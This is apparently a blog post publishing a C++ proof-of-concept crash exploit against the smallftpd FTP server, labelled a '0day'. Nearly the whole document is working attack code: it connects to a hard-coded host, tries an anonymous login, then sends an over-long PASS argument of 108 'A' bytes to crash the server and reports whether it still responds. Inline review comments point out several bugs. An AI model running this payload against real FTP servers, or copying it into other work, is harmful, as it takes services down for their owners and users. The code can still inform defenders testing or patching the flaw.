fredag 24 oktober 2025

smallftpd 0day (Author:Claes Spett (.PrØÐiGy))







 #pragma warning(disable:4996) 



#include <winsock2.h>

#include <ws2tcpip.h>

#include <iostream>

#include <string>

#pragma comment(lib, "ws2_32.lib")


// Denial-of-service PoC driver: connects to the hard-coded FTP target,
// reads the greeting, attempts one anonymous login, then sends a single
// PASS command whose argument is 108 bytes of 0x41 ('A') and reports
// whether the server still answers. All network I/O is blocking Winsock
// with a 10 s receive timeout. Returns nothing; setup failures are printed
// to std::cerr and the function returns early after releasing the socket.
//
// On the wire this is an FTP session in which PASS carries an over-long,
// single-character argument before any successful login, which is what a
// protocol-aware sensor would see.
//
// Review notes (behaviour of the code as written):
//  - The status line printed below claims a 100-byte payload, but the
//    literal is 6 * 16 + 12 = 108 bytes; the printed figure is stale.
//  - serverAddr is never zero-initialised (sin_zero is indeterminate) and
//    the inet_pton() result is not checked, so on a malformed host string
//    sin_addr is left unset before connect().
//  - send() results for USER/PASS are ignored; recv() returning 0 (peer
//    closed) and SOCKET_ERROR (timeout or reset) are reported identically.
//  - Winsock calls never throw, so the try/catch around the final recv()
//    can never reach its handler.
void exploit_crash() {

    // Target is fixed at compile time; there is no argument parsing.
    std::string host = "192.168.1.206";

    int port = 21;


    std::cout << "FTP Server Crash Exploit" << std::endl;

    std::cout << "Target: " << host << ":" << port << std::endl;

    std::cout << "Server Type: unknown" << std::endl;

    std::cout << "Command: PASS" << std::endl;

    // NOTE(review): does not match the 108-byte literal sent further down.
    std::cout << "Payload: 100 bytes" << std::endl;

    std::cout << "Status: VERIFIED CRASH" << std::endl;

    std::cout << "Anonymous Login: False" << std::endl;

    std::cout << std::endl;


    // Check if server is up

    std::cout << "Checking server status..." << std::endl;


    // Winsock 2.2 initialisation; every later early return must undo it.
    WSADATA wsaData;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {

        std::cerr << "WSAStartup failed" << std::endl;

        return;

    }


    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (sock == INVALID_SOCKET) {

        std::cerr << "Socket creation failed" << std::endl;

        WSACleanup();

        return;

    }


    // Set timeout

    // Receive timeout in milliseconds (Winsock takes SO_RCVTIMEO as an
    // integer number of ms); the setsockopt() result is not checked.
    int timeout = 10000;

    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout));


    // NOTE(review): not zero-initialised; only family/port/addr are set.
    sockaddr_in serverAddr;

    serverAddr.sin_family = AF_INET;

    serverAddr.sin_port = htons(port);

    // NOTE(review): return value ignored; on failure sin_addr stays unset.
    inet_pton(AF_INET, host.c_str(), &serverAddr.sin_addr);


    if (connect(sock, (sockaddr*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {

        std::cerr << "Connection failed" << std::endl;

        closesocket(sock);

        WSACleanup();

        return;

    }


    std::cout << "Server is online" << std::endl;

    std::cout << "Sending crash payload..." << std::endl;


    // Shared receive buffer; one byte is always reserved for the terminator.
    char buffer[1024];


    // Get banner

    // Blocking read of the greeting (up to the 10 s timeout); a 0 or
    // SOCKET_ERROR result is silently ignored here.
    int bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

    if (bytesReceived > 0) {

        buffer[bytesReceived] = '\0';

        std::cout << "Banner: " << buffer << std::endl;

    }


    // Try login methods

    bool login_success = false;

    // Single credential pair; the loop below runs exactly once.
    std::string login_methods[][2] = { {"anonymous", "anonymous"} };


    for (auto& login : login_methods) {

        std::string username = login[0];

        std::string password = login[1];


        std::cout << "Trying login: " << username << "/" << password << std::endl;


        // Send USER command

        std::string user_cmd = "USER " + username + "\r\n";

        // send() result is not checked.
        send(sock, user_cmd.c_str(), user_cmd.length(), 0);


        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "USER response: " << buffer << std::endl;

        }


        // Send PASS command  

        std::string pass_cmd = "PASS " + password + "\r\n";

        // send() result is not checked.
        send(sock, pass_cmd.c_str(), pass_cmd.length(), 0);


        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "PASS response: " << buffer << std::endl;


            // Check if login was successful

            std::string response(buffer);

            // Substring match anywhere in the reply text, not only on the
            // 3-digit code at the start of the line.
            if (response.find("230") != std::string::npos ||

                response.find("Login successful") != std::string::npos) {

                std::cout << "Login successful as " << username << std::endl;

                login_success = true;

                break;

            }

            else {

                std::cout << "Login failed as " << username << std::endl;

            }

        }

    }


    // Login outcome does not change what is sent next.
    if (!login_success) {

        std::cout << "WARNING: Could not login, but continuing with exploit attempt..." << std::endl;

    }


    // Send crash payload

    std::string command = "PASS ";

    // 6 lines of 16 bytes + 12 bytes = 108 x 0x41 ('A').
    std::string payload =

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";


    // "PASS " + 108 bytes + CRLF = 115 bytes on the wire.
    std::string crash_payload = command + payload + "\r\n";


    std::cout << "Sending crash payload..." << std::endl;

    // bytesSent is SOCKET_ERROR (-1) on failure; it is only printed, not tested.
    int bytesSent = send(sock, crash_payload.c_str(), crash_payload.length(), 0);

    std::cout << "Sent " << bytesSent << " bytes" << std::endl;


    // Try to get response

    // NOTE(review): recv() does not throw. A peer reset returns SOCKET_ERROR
    // and a clean close returns 0; both land in the else branch below and are
    // reported as a timeout, so the catch handler is unreachable.
    try {

        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "Response: " << buffer << std::endl;

        }

        else {

            std::cout << "No response received (timeout - possible crash)" << std::endl;

        }

    }

    catch (...) {

        std::cout << "Connection reset by peer (possible crash)" << std::endl;

    }


    // Normal teardown; the early-return paths above do the same.
    closesocket(sock);

    WSACleanup();

}


// Entry point: print the banner line, run the single PoC routine, exit 0.
// Takes no arguments; the target is hard-coded inside exploit_crash().
int main() {
    std::cout << "smallftpd 0day Claes Spett (.PrØÐiGy)" << std::endl;
    exploit_crash();
    // Falling off the end of main() is equivalent to `return 0;`.
}
